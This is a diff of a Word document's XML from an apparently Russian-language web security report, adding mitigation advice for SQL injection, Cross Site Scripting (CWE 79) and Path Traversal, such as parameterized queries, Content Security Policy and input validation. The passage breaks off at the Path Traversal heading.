           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -22049,10 +22185,17 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -22067,7 +22210,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -22084,25 +22227,25 @@
         </w:rPr>
         <w:t xml:space="preserve">Базовая оценка 10.0 </w:t>
       </w:r>
-      <w:r/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -22128,7 +22271,34 @@
           <w:szCs w:val="28"/>
           <w:highlight w:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">использование параметризованных запросов и подготовленных операторов SQL для выполнения запросов к базе данных, фильтрацию и экранирование пользовательского ввода, регулярное обновление и мониторинг безопасности приложения, а также использование принципов м</w:t>
+        <w:t xml:space="preserve">и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">спользование параметризованных запросов и подготовленных операторов SQL для выполнения запросов к базе данных, фильтрацию и экранирование пользовательского ввода, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">отключите вывод информации об ошибках базы данных на продакшене (отображение деталей ошибок SQL может предоставить злоумышленникам дополнительную информацию для проведения атак SQL Injection)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, регулярное обновление и мониторинг безопасности приложения, а также использование принципов м</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -22147,6 +22317,14 @@
           <w:highlight w:val="none"/>
         </w:rPr>
         <w:t xml:space="preserve">.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
       </w:r>
       <w:r>
         <w:rPr>
@@ -22159,7 +22337,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -22184,10 +22362,17 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -22212,7 +22397,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Cross Site Scripting</w:t>
       </w:r>
-      <w:r/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -22220,6 +22404,13 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t xml:space="preserve"> (CWE 79) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
       </w:r>
       <w:r>
         <w:rPr>
@@ -22231,7 +22422,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -22247,7 +22438,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -22265,7 +22456,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Базовая оценка 8.8</w:t>
       </w:r>
-      <w:r/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -22285,7 +22475,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -22302,34 +22492,43 @@
           <w:szCs w:val="28"/>
           <w:highlight w:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">Рекомендации по устранению Cross Site Scripting (DOM Based)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> включают в себя использование</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> правильной фильтрации и экранирования входных данных, а также регулярной проверки на наличие уязвимостей XSS в коде приложения</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">.</w:t>
+        <w:t xml:space="preserve">Рекомендации по защите от Cross Site Scripting </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">включают в себя </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">применение различных методов и подходов на уровнях приложения, сервера и клиента</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -22342,39 +22541,55 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="44"/>
+        </w:numPr>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Cross Site Scripting (Reflected)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="none"/>
-        </w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">использование</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> правильной фильтрации и экранирования входных данных</w:t>
+      </w:r>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -22387,60 +22602,1197 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="44"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">использование Content Security Policy (CSP) для ограничения источников данных, таких как скрипты, стили и изображения, которые могут быть загружены и выполнены в контексте вашего веб-приложения</w:t>
+      </w:r>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="44"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">использование безопасных методов вывода данных, таких как `innerText` вместо `innerHTML` или аналогичных методов, которые не интерпретируют HTML-теги и JavaScript-код</w:t>
+      </w:r>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="885"/>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="44"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">проводите строгую валидацию и санитизацию входных данных на сервере, чтобы убедиться, что они соответствуют ожидаемым форматам и не содержат вредоносного кода</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="44"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">не храните конфиденциальные данные в куках или п</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">араметрах URL</w:t>
+      </w:r>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="44"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">обучайте разработчиков и тестировщиков на предмет атак XSS, включая DOM Based XSS, и методов их предотвращения</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="44"/>
+        </w:numPr>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">регулярно обновляйте и анализируйте код приложения на предмет уязвимостей XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Внедрение и поддержка этих методов защиты поможет снизить риск успешных атак Cross Site Scripting</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Path Traversal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (CWE 22)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
